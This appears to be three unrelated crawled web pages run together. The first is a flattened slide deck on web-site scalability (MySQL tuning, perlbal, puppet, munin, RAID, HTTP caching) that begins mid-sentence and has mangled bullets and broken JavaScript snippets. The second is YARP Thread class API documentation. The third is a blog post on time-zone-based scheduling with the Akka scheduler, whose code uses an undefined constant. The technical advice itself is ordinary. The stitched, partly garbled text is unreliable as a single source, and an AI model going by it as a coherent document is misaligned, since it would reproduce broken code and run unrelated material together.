and rsync to each webserver (or use NFS, but...) • Or a MySQL replica on each webserver Stored Procedures Dangerous • • • • Not horizontal Bad: Work done in the database server (unless it’s read-only and replicated) Good: Work done on one of the scalable web fronts Only do stored procedures if they save the database work (network-io work > SP work) a brief diversion ... Running Oracle now? webservers • • • • • writes Move read operations to MySQL! Replicate from Oracle to a MySQL cluster with “manual replication” Use triggers to keep track of changed rows reads in Oracle Copy them to the MySQL master server with a replication program Good way to “sneak” MySQL in ... Oracle replication program writes master writes slave slave slave reads loadbalancer Optimize the database Faster, faster, faster .... ... very briefly • • The whole conference here is about this ... so I’ll just touch on a few ideas Memory for MySQL = good • • • • • Put as much memory you can afford in the server (Currently 2GB sticks are the best value) InnoDB: Let MySQL use ~all memory (don’t use more than is available, of course!) MyISAM: Leave more memory for OS page caches Can you afford to lose data on a crash? Optimize accordingly Disk setup: We’ll talk about RAID later What’s your app doing? • • • Enable query logging in your development DB! Are all those queries really necessary? Cache candidates? (you do have a devel db, right?) • • • Just add “log=/var/lib/mysq/sql.log” to .cnf Slow query logging: log-slow-queries log-queries-not-using-indexes long_query_time=1 mysqldumpslow parses the slow log • 5.1+ does not require a server restart and, can log directly into a CSV table... Table Choice • • Short version: Use InnoDB, it’s harder to make them fall over Long version: Use InnoDB except for • • • • • Big read-only tables (smaller, less IO) High volume streaming tables (think logging) • • Locked tables / INSERT DELAYED ARCHIVE table engine Specialized engines for special needs More engines in the future For now: InnoDB Multiple MySQL instances • • • • • Run different MySQL instances for different workloads • • Even when they share the same server anyway! InnoDB vs MyISAM instance prod cluster (innodb, normalized columns) Move to separate hardware and replication easier Optimize MySQL for the particular workload Very easy to setup with the instance manager or mysqld_multi mysql.com init.d script supports the instance manager (don’t use the redhat/fedora script!) search_load process search cluster (myisam, fulltext columns) Config tuning helps Query tuning works • • • • • Configuration tuning helps a little The big performance improvements comes from schema and query optimizations – focus on that! Design schema based on queries Think about what kind of operations will be common on the data; don’t go for “perfect schema beauty” What results do you need? (now and in the future) EXPLAIN • • • Use the “EXPLAIN SELECT ...” command to check the query Baron Schwartz talks about this 2pm on Tuesday! Be sure to read Use smaller data • Use Integers • • Always use integers for join keys And when possible for sorts, group bys, comparisons • • Don’t use bigint when int will do Don’t use varchar(255) when varchar(20) will do Store Large Binary Objects (aka how to store images) • • • • Meta-data table (name, size, ...) Store images either in the file system • • • • meta data says “server ‘123’, filename ‘abc’” (If you want this; use mogilefs or Amazon S3 for storage!) OR store images in other tables Split data up so each table don’t get bigger than ~4GB Include “last modified date” in meta data Include it in your URLs if possible to optimize caching images/$timestamp/$id.jpg) (/ Reconsider Persistent DB Connections • • • • • • DB connection = thread = memory With partitioning all httpd processes talk to all DBs With lots of caching you might not need the main database that often MySQL connections are fast Always use persistent connections with Oracle! • • Commercial connection pooling products pgsql, sybase, oracle? Need thousands of persistent connections? In Perl the new DBD::Gofer can help with pooling! InnoDB configuration • innodb_file_per_table • Makes optimize Splits your innodb data into a file per table instead of one big annoying file table `table` clear unused space • innodb_buffer_pool_size=($MEM*0.80) • innodb_flush_log_at_trx_commit setting • innodb_log_file_size • transaction-isolation = READ-COMMITTED My favorite MySQL feature • • • insert into t (somedate) values (“blah”); insert into t (someenum) values (“bad value”); Make MySQL picky about bad input! • SET sql_mode = 'STRICT_TRANS_TABLES’; • Make your application do this on connect Don’t overwork the DB • • • • Databases don’t easily scale Don’t make the database do a ton of work Referential integrity is good • Tons of stored procedures to validate and process data not so much Don’t be too afraid of de-normalized data – sometimes it’s worth the tradeoffs (call them summary tables and the DBAs won’t notice) Use your resources wisely don’t implode when things run warm Work in parallel • • Split the work into smaller (but reasonable) pieces and run them on different boxes Send the sub-requests off as soon as possible, do something else and then retrieve the results Job queues • • • • Processing time too long for the user to wait? Can only process N requests / jobs in parallel? Use queues (and external worker processes) IFRAMEs and AJAX can make this really spiffy (tell the user “the wait time is 20 seconds”) Job queue tools • Database “queue” webservers • • • • Dedicated queue table or just processed_on and grabbed_on columns Webserver submits job First available “worker” picks it up and returns the result to the queue Webserver polls for status Queue DB workers workers workers workers More Job Queue tools • beanstalkd - great protocol, fast, no persistence (yet) • gearman - for one off out-of-band jobs • starling - from twitter, memcached protocol, disk based persistence • TheSchwartz from SixApart, used in Movable Type • Spread • MQ / Java Messaging Service(?) / ... Log http requests • • • • • • Log slow http transactions to a database time, response_time, uri, remote_ip, user_agent, request_args, user, svn_branch_revision, log_reason (a “SET” column), ... Log to ARCHIVE tables, rotate hourly / weekly / ... Log 2% of all requests! Log all 4xx and 5xx requests Great for statistical analysis! • • Which requests are slower Is the site getting faster or slower? Time::HiRes in Perl, microseconds from gettimeofday system call Intermission ? ! • • • • Use light processes for light tasks Thin proxies servers or threads for “network buffers” Goes between the user and your heavier backend application Built-in load-balancing! (for Varnish, perlbal, ...) httpd with mod_proxy / mod_backhand • • perlbal – more on that in a bit Varnish, squid, pound, ... Proxy illustration perlbal or mod_proxy low memory/resource usage Users backends lots of memory db connections etc Light processes • • • • • • Save memory and database connections This works spectacularly well. Really! Can also serve static files Avoid starting your main application as root Load balancing In particular important if your backend processes are “heavy” Light processes • • Apache 2 makes it Really Easy ProxyPreserveHost On <VirtualHost *> ServerName combust.c2.askask.com ServerAlias *.c2.askask.com RewriteEngine on RewriteRule (.*) [P] </VirtualHost> • • Easy to have different “backend environments” on one IP Backend setup (Apache 1.x) Listen 127.0.0.1:8230 Port 80 perlbal configuration CREATE POOL POOL POOL POOL POOL my_apaches my_apaches ADD 10.0.0.10:8080 my_apaches ADD 10.0.0.11:8080 my_apaches ADD 10.0.0.12 my_apaches ADD 10.0.0.13:8081 0.0.0.0:80 reverse_proxy my_apaches on on on CREATE SERVICE balancer SET listen = SET role = SET pool = SET persist_client = SET persist_backend = SET verify_backend = ENABLE balancer A few thoughts on development ... All Unicode All The Time • • The web is international and multilingual, deal with it. All Unicode all the time! (except when you don’t need it – urls, email addresses, ...) • Perl: DBD::mysql was fixed last year! PHP 6 will have improved Unicode support. Ruby 2 will someday, too... • It will never be easier to convert than now! Use UTC Coordinated Universal Time • • • It might not seem important now, but some day ... It will never be easier to convert than now! Store all dates and times as UTC, convert to “local time” on display Build on APIs • • • • • • All APIs All The Time! Use “clean APIs” Internally in your application architecture Loosely coupled APIs are easier to scale • Add versioning to APIs (“&api_version=123”) Easier to scale development Easier to scale deployment Easier to open up to partners and users! Why APIs? • Natural place for “business logic” • • • • • • • Controller = “Speak HTTP” Model = “Speak SQL” View = “Format HTML / ...” API = “Do Stuff” Aggregate just the right amount of data Awesome place for optimizations that matter! The data layer knows too little More development philosophy • • • • Do the Simplest Thing That Can Possibly Work ... but do it really well! Balance the complexity, err on the side of simple This is hard! Pay your technical debt • Don’t incur technical debt • • • “We can’t change that - last we tried the site went down” “Just add a comment with ‘TODO’” “Oops. Where are the backups? What do you mean ‘no’?” “Who has the email with that bug?” • • • Interest on technical debt will kill you Pay it back as soon as you can! Coding guidelines • • • Keep your formatting consistent! • perl: perltidy, perl best practices, Perl::Critic Keep your APIs and module conventions consistent Refactor APIs mercilessly (in particular while they are not public) qmail lessons • • • • Lessons from 10 years of qmail Research paper from Dan Bernstein Eliminate bugs • • Test coverage Keep data flow explicit (continued) qmail lessons (2) • Eliminate code – less code = less bugs! • • • • Refactor common code Reuse code (Unix tools / libs, CPAN, PEAR, Ruby Gems, ...) Reuse access control • Eliminate trusted code – what needs access? Treat transformation code as completely untrusted Joint Strike Fighter • • • • • ~Superset of the “Motor Industry Software Reliability Association Guidelines For The Use Of The C Language In Vehicle Based Software” Really Very Detailed! No recursion! (Ok, ignore this one :-) ) Do make guide lines – know when to break them Have code reviews - make sure every commit email gets read (and have automatic commit emails in the first place!) High Availability and Load Balancing and Disaster Recovery High Availability • • • Automatically handle failures! unplugged the wrong box”, ...) (bad disks, failing fans, “oops, For your app servers the load balancing system should take out “bad servers” (most do) • perlbal or Varnish can do this for http servers Easy-ish for things that can just “run on lots of boxes” Make that service always work! • Sometimes you need a service to always run, but on specific IP addresses • • • • • Load balancers (level 3 or level 7: perlbal/varnish/squid) Routers DNS servers NFS servers Anything that has failover or an alternate server – the IP needs to move (much faster than changing DNS) Load balancing • • • • • Key to horizontal scaling (duh) 1) All requests goes to the load balancer 2) Load balancer picks a “real server” Hardware (lots of vendors) Coyote Point have relatively cheaper ones • Look for older models for cheap on eBay! Linux Virtual Server Open/FreeBSD firewall rules (pf firewall pools) (no automatic failover, have to do that on the “real servers”) Load balancing 2 • • • Use a “level 3” (tcp connections only) tool to send traffic to your proxies Through the proxies do “level 7” (http) load balancing perlbal has some really good features for this! perlbal • • • • • • Event based for HTTP load balancing, web serving, and a mix of the two (see below). Practical fancy features like “multiplexing” keep-alive connections to both users and back-ends Everything can be configured or reconfigured on the fly If you configure your backends to only allow as many connections as they can handle (you should anyway!) perlbal with automatically balance the load “perfectly” Can actually give Perlbal a list of URLs to try. Perlbal will find one that's alive. Instant failover! Varnish • • • • • • • Modern high performance http accelerator Optimized as a “reverse cache” Whenever you would have used squid, give this a look Recently got “Vary” support Super efficient (except it really wants to “take over” a box) Written by Poul-Henning Kamp, famed FreeBSD contributor BSD licensed, work is being paid by a norwegian newspaper • Fail-over tools “move that IP” Buy a “hardware load balancer” • • • • Generally Quite Expensive • (Except on eBay - used network equipment is often great) Not appropriate (cost-wise) until you have MANY servers If the feature list fits it “Just Works” ... but when we are starting out, what do we use? wackamole • • • • • • • • Simple, just moves the IP(s) Can embed Perl so you can run Perl functions when IPs come and go Easy configuration format Setup “groups of IPs” Supports Linux, FreeBSD and Solaris Spread toolkit for communication Easy to troubleshoot (after you get Spread working...) Heartbeat • • • • • • Monitors and moves services (an IP address is “just a service”) v1 has simple but goofy configuration format v2 supports all sorts of groupings, larger clusters (up to 16 servers) Uses /etc/init.d type scripts for running services Maybe more complicated than you want your HA tools Carp + pfsync • Patent-free version of Ciscos “VRRP” (Virtual Router Redundancy Protocol) • FreeBSD and OpenBSD only • Carp (moves IPs) and pfsync (synchronizes firewall state) • (awesome for routers and NAT boxes) • Doesn’t do any service checks, just moves IPs around mysql master master replication manager • • • • • • • mysql-master-master tool can do automatic failover! No shared disk Define potential “readers” and “writers” List of “application access” IPs Reconfigures replication Moves IPs Suggested Configuration • • Open/FreeBSD routers with Carp+pfsync for firewalls A set of boxes with perlbal + wackamole on static “always up” HTTP enabled IPs • Trick on Linux: Allow the perlbal processes to bind to all IPs (no port number tricks or service reconfiguration or restarts!) echo 1 > /proc/sys/net/ipv4/ip_nonlocal_bind or or sysctl -w net.ipv4.ip_nonlocal_bind=1 echo net.ipv4.ip_nonlocal_bind = 1 >> /etc/sysctl.conf • • • Dumb regular http servers “behind” the perlbal ones wackamole for other services like DNS mmm for mysql fail-over Redundancy fallacy! • • Don’t confuse load-balancing with redundancy What happens when one of these two fail? Load balanced servers load / capacity Load (55%) Load (60%) Oops – no redundancy! • • • Always have “n+1” capacity Consider have a “passive spare” (active/passive with two servers) Careful load monitoring! More than 100% load on 1 server! Load (50%) • • • Munin MySQL Network (ganglia, cacti, ...) Load Load (60%) High availability Shared storage • • • • • NFS servers (for diskless servers, ...) Failover for database servers Traditionally either via fiber or SCSI connected to both servers Or NetApp filer boxes All expensive and smells like “the one big server” Cheap high availability storage with DRBD • • • • • Synchronizes a block device between two servers! “Network RAID1” Typically used in Active/Primary-Standby/Secondary setup If the active server goes down the secondary server will switch to primary, run fsck, mount the device and start the service (MySQL / NFS server / ...) v0.8 can do writes on both servers at once – “shared disk semantics” (you need a filesystem on top that supports that, OCFS, GFS, ... – probably not worth it, but neat) Disaster Recovery • Separate from “fail-over” (no disaster if we failed-over...) • • • • “The rescue truck fell in the water” “All the ‘redundant’ network cables melted” “The datacenter got flooded” “The grumpy sysadmin sabotaged everything before he left” Disaster Recovery Planning • • • • • You won’t be back up in 2 hours, but plan so you quickly will have an idea how long it will be Have a status update site / weblog Plans for getting hardware replacements Plans for getting running temporarily on rented “dedicated servers” (ev1servers, rackspace, ...) And .... Backup your databse! • • • • Binary logs! • Keep track of “changes since the last snapshot” Use replication to Another Site (doesn’t help on “for $table = @tables { truncate $table }”) On small databases use mysqldump Zmanda MySQL Backup (or whatever similar tool your database comes with) packages the different tools and options Backup Big Databases • Use mylvmbackup to snapshot and archive • • • • • Requires data on an LVM device (just do it) InnoDB: Automatic recovery! (ooh, magic) MyISAM: Read Lock your database for a few seconds before making the snapshot (on MySQL do a “FLUSH TABLES” first (which might be slow) and then a “FLUSH TABLES WITH READ LOCK” right after) Sync the LVM snapshot elsewhere And then remove the snapshot! • Bonus Optimization: Run the backup from a replication slave! Backup on replication slave • • Or just run the backup from a replication slave ... Keep an extra replica of your master • • shutdown mysqld and archive the data Small-ish databases: mysqldump --single-transaction All Automation All The Time or How to manage 200 servers in your spare-time System Management Keep software deployments easy • • • Make upgrading the software a simple process Script database schema changes Keep configuration minimal • • • • Servername (“”) Database names (“userdb = host=db1;db=users”;...” If there’s a reasonable default, put the default in the code (for example ) “deployment_mode = devel / test / prod” lets you put reasonable defaults in code Easy software deployment 2 • • • • • • How do you distribute your code to all the app servers? Use your source code repository (Subversion etc)! (tell your script to svn up to revision 123 and restart) .tar.gz to be unpacked on each server .rpm or .deb package NFS mount and symlinks No matter what: Make your test environment use the same mechanism as production and: Have it scripted! have everything scripted! actually, Configuration management Rule Number One • • • • • Configuration in SVN (or similar) “infrastructure/” repository SVN rather than rcs to automatically have a backup in the Subversion server – which you are carefully backing up anyway Keep notes! Accessible when the wiki is down; easy to grep Don’t worry about perfect layout; just keep it updated Configuration management Rule Two • • • • Repeatable configuration! Can you reinstall any server Right Now? Use tools to keep system configuration in sync Upcoming configuration management (and more) tools! • • csync2 (librsync and sqlite based sync tool) puppet (central server, rule system, ruby!) puppet • Automating sysadmin tasks! • 1) Client provides “facter” to server 2) Server makes configuration 3) Client implements configuration service { "sshd": enable => true, ensure => running } package { "vim-enhanced": ensure => installed } package { "emacs": ensure => installed } • • node db-server inherits standard { include mysql_server include solfo_hw } puppet example node db2, db3, db4 inherits db-server { } node trillian inherits db-server { include ypbot_devel_dependencies } # ----------------------------class mysql_client { package { "MySQL-client-standard": ensure => installed } package { "MySQL-shared-compat": ensure => installed } } class mysql_server { file { "/mysql": ensure => directory, } package { "MySQL-server-standard": ensure => installed } } include mysql_client puppet mount example class nfs_client_pkg { • Ensure an NFS mount exists, except on the NFS servers file { "/pkg": ensure => directory, } $mount = $hostname ? { "nfs-a" => absent, "nfs-b" => absent, default => mounted } mount { "/pkg": atboot => true, device => 'nfs.la.sol:/pkg', ensure => $mount, fstype => 'nfs4', options => 'ro,intr,noatime', require => File["/pkg"], } } More puppet features • In addition to services, packages and mounts... • • • • • Manage users Manage crontabs Copy configuration files (with templates) … and much more Recipes, reference documentation and more at Backups! • • Backup everything you can • • • • • • Check/test the backups routinely Super easy deployment: rsnapshot Uses rsync and hardlinks to efficiently store many backup generations Server initiated – just needs ssh and rsync on client Simple restore – files • Other tools Amanda (Zmanda) Bacula Backup is cheap! • • • Extra disk in a box somewhere? That can do! Disks are cheap – get more! Disk backup server in your office: Enclosure + PSU: $275 CPU + Board + RAM: $400 3ware raid (optional): $575 6x1TB disks: $1700 (~4TB in raid 6) = $3000 for 4TB backup space, easily expandable (or less than $5000 for 9TB space with raid 6 and hot standby) • Ability to get back your data = Priceless! somewhat tangentially ... RAID Levels RAID-I (1989) consisted of a Sun 4/280 workstation with 128 MB of DRAM, four dualstring SCSI controllers, 28 5.25-inch SCSI disks and specialized disk striping software. Basic RAID levels • • • • • RAID 0 Stripe all disks (capacity = N*S Fail: Any disk RAID 1 Mirror all disks (capacity = S) Fail: All disks RAID 10 Combine RAID 1 and 0 (capacity = N*S / 2) RAID 5 RAID 0 with parity (capacity = N*S - S) Fail: 2 disks RAID 6 Two parity disks (capacity = N*S - S*2) Fail: 3 disks! RAID 1 • • • Mirror all disks to all disks Simple - easiest to recover! Use for system disks and small backup devices RAID 0 • • • • • • Use for redundant database mirrors or scratch data that you can quickly rebuild Absolutely never for anything you care about Failure = system failure Great performance; no safety Capacity = 100% Disk IO = every IO available is “useful” RAID 10 • • • • • Stripe of mirrored devices IO performance and capacity of half your disks - not bad! Relatively good redundancy, lose one disk from each of the “sub-mirrors” Quick rebuild: Just rebuild one mirror More disks = more failures! If you have more than X disks, keep a hot spare. RAID 5 • • • • • Terrible database performance A partial block write = read all disks! When degraded a RAID 5 is a RAID 0 in redundancy! Rebuilding a RAID 5 is a great way to find more latent errors Don’t use RAID 5 – just not worth it RAID 6 • • • Like RAID 5 but doesn’t fail as easily Can survive two disks failing Don’t make your arrays too big • • 12 disks = 12x failure rate of one disk! Always keep a hot-spare if you can Hardware or software RAID? • • Hardware RAID: Worth it for the Battery Backup Unit! • • • • Battery allows the controller to – safely – fake “Sure mister, it’s safely on disk” responses No Battery? Use Software RAID Low or no CPU use Easier and faster to recover from failures! • • Write-intent bitmap More flexible layout options RAID 1 partition for system + RAID 10 for data on each disk nagios • • • • Monitoring “is the website up” is easy Monitoring dozens or hundreds of sub-systems is hard Monitor everything! Disk usage, system daemons, applications daemons, databases, data states, ... nagios configuration tricks • • nagios configuration is famously painful Somewhat undeserved! examples of simple configuration - templates - groups nagios best practices • • • • All alerts must be “important” – if some alerts are ignored, all other alerts easily are, too. Don’t get 1000 alerts if a DB server is down Don’t get paged if 1 of 50 webservers crashed Why do you as a non-sysadmin care? • • Use nagios to help the sysadmins fix the application Get information to improve reliability Resource management • • If possible, only run one service per server (makes monitoring/ managing your capacity much easier) Balance how you use the hardware • • • • Use memory to save CPU or IO Balance your resource use (CPU vs RAM vs IO) Extra memory on the app server? Run memcached! Extra CPU + memory? Run an application server in a Xen box! • Don’t swap memory to disk. Ever. Netboot your application servers! • • • • • Definitely netboot the installation (you’ll never buy another server with a tedious CD/DVD drive) • RHEL / Fedora: Kickstart + puppet = from box to all running in ~10 minutes Netboot application servers FreeBSD has awesome support for this Debian is supposed to Fedora Core 7 8 ?? looks like it will (RHEL5uX too?) No shooting in foot! • Ooops? Did that leak memory again? Development server went kaboom? • Edit /etc/security/limits.conf soft rss • @users @users @users hard rss hard as 250000 250000 500000 • Use to set higher open files limits for mysqld etc, too! noatime mounts • • • • Mount ~all your filesystems “noatime” By default the filesystem will do a write every time it accesses/reads a file! That’s clearly insane Stop the madness, mount noatime /home /home ext3 ext3 defaults noatime 1 2 1 2 /dev/vg0/lvhome /dev/vg0/lvhome graph everything! • • mrtg The Multi Router Traffic Grapher rrdtool round-robin-database tool • • • Fixed size database handling time series data Lots of tools built on rrdtool ganglia cluster/grid monitoring system Historical perspective basic bandwidth graph Launch Steady growth Try CDN Enable compression for all browsers munin • • • • “Hugin and Munin are the ravens of the Norse god king Odin. They flew all over Midgard for him, seeing and remembering, and later telling him.” Munin is also AWESOME! Shows trends for system statistics Easy to extend mysql query stats Query cache useful? • • • Is the MySQL query cache useful for your application? Make a graph! In this particular installation it answers half of the selects squid cache hitratio? • • • • Red: Cache Miss Green: Cache Hit Increased cache size to get better hit ratio Huh? When? Don’t confuse graphs with “hard data” Keep the real numbers, too! munin: capacity planning, cpu • • xen system 6 cpus plenty to spare Blocking on disk I/O? • • Pink: iowait This box needs more memory or faster disks! More IO Wait fun • • 8 CPU box - harder to see the details High IO Wait More IO Wait fun • Upgraded memory, iowait dropped! IO Statistics • • per disk IO statistics more memory, less disk IO more memory stats fix app config plenty memory free fix perlbal leak room for memcached? took a week to use new memory for caching plenty memory to run memcached here! munin: spot a problem? • • 1 CPU 100% busy on “system”? Started a few days ago munin: spot a problem? • • Has it happened before? Yup - occasionally! munin: spot a problem? • IPMI driver went kaboom! Make your own Munin plugin • Any executable with the right output # ./load config graph_title Load average graph_args --base 1000 -l 0 graph_vlabel load ... load.label load load.info Average load for the five minutes. ... # ./load fetch load.value 1.67 Munin as a nagios agent • • • Use a Nagios plugin to talk to munin! Munin is already setup to monitor important metrics Nagios plugin talks to munin as if the collector agent define service { use local-service hostgroup_name xen-servers,db-servers,app-ser service_description df check_command check_munin!df!88!94 } A little on hardware • • • • • • • • Hardware is a commodity! Configuring it isn’t (yet – Google AppEngine!) Managed services - cthought.com, RackSpace, SoftLayer ... Managing hardware != Managing systems Rent A Server (crummy support, easy on hardware replacements, easy on cashflow) Amazon EC2 (just announced persistent storage!) Use standard configurations and automatic deployment Now you can buy or rent servers from anywhere! Use a CDN • • • • • If you serve more than a few TB static files a month... Consider a Content Delivery Network Fast for users, easier on your network Pass-through proxy cache - easy deployment Akamai, LimeLight, PantherExpress, CacheFly, ... (only Akamai supports compressed files (??)) Client Performance “Best Practices for Speeding Up Your Web Site” Recommended Reading • “High Performance Web Sites” book by Steve Souders • /performance/ • • • Use YSlow Firefox extension made by Yahoo! Quickly checks your site for the Yahoo Performance Guidelines I’ll quickly go over a few server / infrastructure related rules ... • Minimize HTTP Requests • • • Generate and download the main html in 0.3 seconds Making connections and downloading 38 small dependencies (CSS, JS, PNG, …) – more than 0.3s! Combine small JS and CSS files into fewer larger files • • Make it part of your release process! In development use many small files, in production group them • CSS sprites to minimize image requests Add an “Expires” header • • • • Avoid unnecessary “yup, that hasn’t changed” requests Tell the browser to cache objects HTTP headers.flickr.com/photos/leecullivan/ • Expires: Mon, Jan 28 2019 23:45:00 GMT Cache-Control: max-age=315360000 Must change the URL when the file changes! Ultimate Cache Control • • • • • • Have all your static resources be truly static Change the URL when the resource changes Version number – from Subversion, git, … /js/foo.v1.js /js/foo.v2.js ... Modified timestamp – good for development /js/foo.v1206878853.js (partial) MD5 of file contents – safe for cache poisoning /js/foo.v861ad7064c17.js Build a “file to version” mapping in your build process and load in the application Serve “versioned” files • • • Crazy easy with Apache rewrite rules “/js/foo.js” is served normally “/js/foo.vX.js” is served with extra cache headers RewriteEngine on # remove version number, set environment variable RewriteRule ^/(.*\.)v[0-9a-f.]+\.(css|js|gif|png|jpg|ico)$ \ /$1$2 [E=VERSIONED_FILE:1] # Set headers when “VERSIONED_FILE” environment is set Header add "Expires" "Fri, Nov 10 2017 23:45:00 GMT" \ env=VERSIONED_FILE Header add "Cache-Control" "max-age=315360001" \ env=VERSIONED_FILE Minimize CSS, JS and PNG • • Minimize JS and CSS files (remove whitespace, shorten JS, …) • • Add to your “version map” if you have a “-min” version of the file to be used in production Losslessly recompress PNG files with OptiPNG) { // alert(response.system_error); } else if (response.length) { var eventshtml=''; for (var i=0; i<response.length; i++) { eventshtml+='<br /><a href="'') } catch(err) {} }, failure:function(o) { // error contacting server } Pre-minimized JS ~1600 to ~1100 bytes ~30% saved! Minimized JS){}else{if(response.length){var eventshtml="";for(var i=0;i<response.length;i++){eventshtml+='<br /><a href=" event/'"); Gzip components • • • • Don’t make the users download several times more data than necessary. Browser: Accept-Encoding: gzip, deflate Server: Content-Encoding: gzip Dynamic content (Apache 2.x) LoadModule mod_deflate … AddOutputFilterByType DEFLATE text/html text/plain text/javascript text/xml Gzip static objects • • Pre-compress .js and .css files in the build process foo.js > foo.js.gzip AddEncoding gzip .gzip # If the user accepts gzip data RewriteCond %{HTTP:Accept-Encoding} gzip # … and we have a .gzip version of the file RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME}.gzip -f # then serve that instead of the original file RewriteRule ^(.*)$ $1.gzip [L] Think Horizontal! remember (and go build som ething n eat!) Books! • • • “Building Scalable Web Sites” by Cal Henderson of Flickr fame • Only $26 on Amazon! from your local bookstore too) (But it’s worth the $40 “Scalable Internet Architectures” by Theo Schlossnagle Teaching concepts with lots of examples “High Performance Web Sites” by Steve Souders Front end performance • • • • • • • • • • • • • • • Thanks! Direct and indirect help from ... Cal Henderson, Flickr Yahoo! Brad Fitzpatrick, LiveJournal SixApart Google Graham Barr Tim Bunce Perrin Harkins David Wheeler Tom Metro Kevin Scaldeferri, Overture Yahoo! Vani Raja Hansen Jay Pipes Joshua Schachter Ticketmaster Shopzilla .. and many more – The End – Questions? Thank you! More questions? Comments? Need consulting? [email protected]
https://www.scribd.com/document/2569319/Real-World-Web-Performance-Scalability
CC-MAIN-2017-43
en
refinedweb
An abstraction for a thread of execution. More... #include <yarp/os/Thread.h> An abstraction for a thread of execution. Definition at line 23 of file Thread.h. Constructor. Thread begins in a dormant state. Call Thread::start to get things going. Definition at line 53 of file Thread.cpp. Destructor. Definition at line 61 of file Thread.cpp. Called just after a new thread starts (or fails to start), this is executed by the same thread that calls start(). Definition at line 102 of file Thread.cpp. Called just before a new thread starts. This method is executed by the same thread that calls start(). Definition at line 99 of file Thread.cpp. Check how many threads are running. Definition at line 110 of file Thread.cpp. Get a unique identifier for the thread. Definition at line 115 of file Thread.cpp. Get a unique identifier for the calling thread. Definition at line 119 of file Thread.cpp. Query the current scheduling policy of the thread, if the OS supports that. Definition at line 133 of file Thread.cpp. Query the current priority of the thread, if the OS supports that. Definition at line 129 of file Thread.cpp. Returns true if the thread is running (Thread::start has been called successfully and the thread has not stopped). Definition at line 95 of file Thread.cpp. Returns true if the thread is stopping (Thread::stop has been called). Definition at line 90 of file Thread.cpp. The function returns when the thread execution has completed. Stops the execution of the thread that calls this function until either the thread to join has finished execution (when it returns from run()) or after seconds seconds. Definition at line 70 of file Thread.cpp. Call-back, called while halting the thread (before join). This callback is executed by the same thread that calls stop(). It should not be called directly. Override this method to do the right thing for your particular Thread::run. Reimplemented in yarp::os::Terminee, and ZombieHunterThread. Definition at line 80 of file Thread.c. Implemented in yarp::dev::FakeMotionControl, yarp::dev::MEIMotionControl, yarp::dev::FakeBot, yarp::dev::JrkerrMotionControl, RunReadWrite, yarp::dev::KinectDeviceDriver::USBThread, yarp::dev::ServerKinect, yarp::dev::ServerInertial, RFModuleThreadedHandler, yarp::dev::ServerSerial, yarp::dev::ServerSoundGrabber, SoundResources, RunTerminator, yarp::dev::UrbtcControl, yarp::os::RosNameSpace, yarp::dev::VirtualAnalogWrapper, yarp::dev::StageControl, ModuleHelper, yarp::os::Terminee, ZombieHunterThread, streamThread, yarp::dev::WxsdlWriter, RFModuleRespondHandler, KinectThread, yarp::os::MpiControlThread, and MessageStackThread. Set the default stack size for all threads created after this point. A value of 0 will use a reasonable default. Definition at line 137 of file Thread.cpp. Set the stack size for the new thread. Must be called before Thread::start Definition at line 106 of file Thread.cpp. Set the priority and scheduling policy of the thread, if the OS supports that. Definition at line 124 85 of file Thread.cpp. Stop the thread. Thread::isStopping will start returning true. The user-defined Thread::onStop method will be called. Then, this simply sits back and waits. Wait for thread termination so cannot be called from within run(). Definition at line 74 of file Thread.c in streamThread, and yarp::os::MpiControlThread. Definition at line 107 of file Thread.h. Release method. The thread executes this function once when it exits, after the last "run". This is a good place to release resources that were initialized in threadInit() (release memory, and device driver resources). Reimplemented in streamThread, and yarp::os::MpiControlThread. Definition at line 116 of file Thread.h. Reschedule the execution of current thread, allowing other threads to run. Definition at line 141 of file Thread.cpp.
http://yarp.it/classyarp_1_1os_1_1Thread.html
CC-MAIN-2017-43
en
refinedweb
In this blog, we will be scheduling jobs based on time using Akka scheduler. The jobs will be scheduled based on IST(Indian Standard Time). It is basically an alternative to Quartz Scheduler to some extent which is also used to schedule the time-based job. We can schedule jobs at any point of time i.e schedule jobs based on IST or any other TimeZone like UTC Let’s say, If you want your job to be scheduled at 9:00:00 AM IST every day, What would you do?. Scheduling such a job using the normal Akka scheduler is not easy. So what I have done is, I have written an extra function so that our normal Akka scheduler acts as a Quartz Scheduler but only ‘Time Based ’ not Calendar based. With the example I am going to share you will be able to schedule time-based jobs for almost any TimeZone, you just need to mention the timezone. In this example, I am focusing on IST(Indian Standard Time) but you can tweak it. Example Send an E-mail every day at 09:00:00 AM every day. Akka quartz is one way, but If you can play around with normal Akka scheduler why mess around with Akka quartz. Alright Let’s head over to the code and see How can we accomplish it. Here is the Schedule Actor Class import akka.actor.Actor class ScheduleActor extends Actor { import ScheduleActor._ var count = 1 //I am using var over here because it's a simple example to increment count. However you should prefer immutability wherever possible. def receive: PartialFunction[Any, Unit] = { case IncrementNumber => count+=1 println(count) } } /** * Created by deepak on 22/1/17. */ object ScheduleActor { case object IncrementNumber } Here is the implementation for the job. import java.text.SimpleDateFormat import java.util.{Date, TimeZone} import scala.concurrent.duration._ import ScheduleActor.IncrementNumber import akka.actor.{ActorSystem, Props} /** * Created by deepak on 22/1/17. */ object ScheduleJob extends App { val system = ActorSystem("SchedulerSystem") val schedulerActor = system.actorOf(Props(classOf[ScheduleActor]), "Actor") implicit val ec = system.dispatcher system.scheduler .schedule(calculateInitialDelay().milliseconds, 60.seconds)( schedulerActor ! IncrementNumber) //the first argument in the schedule function is the initial delay //the second argument in the schedule function is the interval def calculateInitialDelay(): Long = { val now = new Date() val sdf = new SimpleDateFormat("HH:mm:ss") sdf.setTimeZone(TimeZone.getTimeZone("IST")) val time1 = sdf.format(now) val time2 = "00:00:00" //this is where we provide the time(IST) for example I want the job scheduled at 9PM IST I would replace 00:00:00 with 21:00:00 val format = new SimpleDateFormat("HH:mm:ss") val date1 = format.parse(time1) val date2 = format.parse(time2) val timeDifference = date2.getTime() - date1.getTime() val calculatedTime = if (timeDifference < 0) (Constant.DAYHOURS + timeDifference) else timeDifference // val modifiedDate = projectDbService.getModifiedDate("sumit") calculatedTime } //Calculate initial delay method basically triggers the job at the IST time provided above. } That’s all, you are all set to schedule time-based jobs without using Quartz Scheduler. Full code is available on github If you find any challenge, Do let me know in the comments. If you enjoyed this post, I’d be very grateful if you’d help it spread.Keep smiling, Keep coding! Cheers!
https://blog.knoldus.com/2017/02/10/an-alternative-to-akka-quartz-time-timezoneist-and-others-based-jobs-using-akka-scheduler/
CC-MAIN-2017-43
en
refinedweb
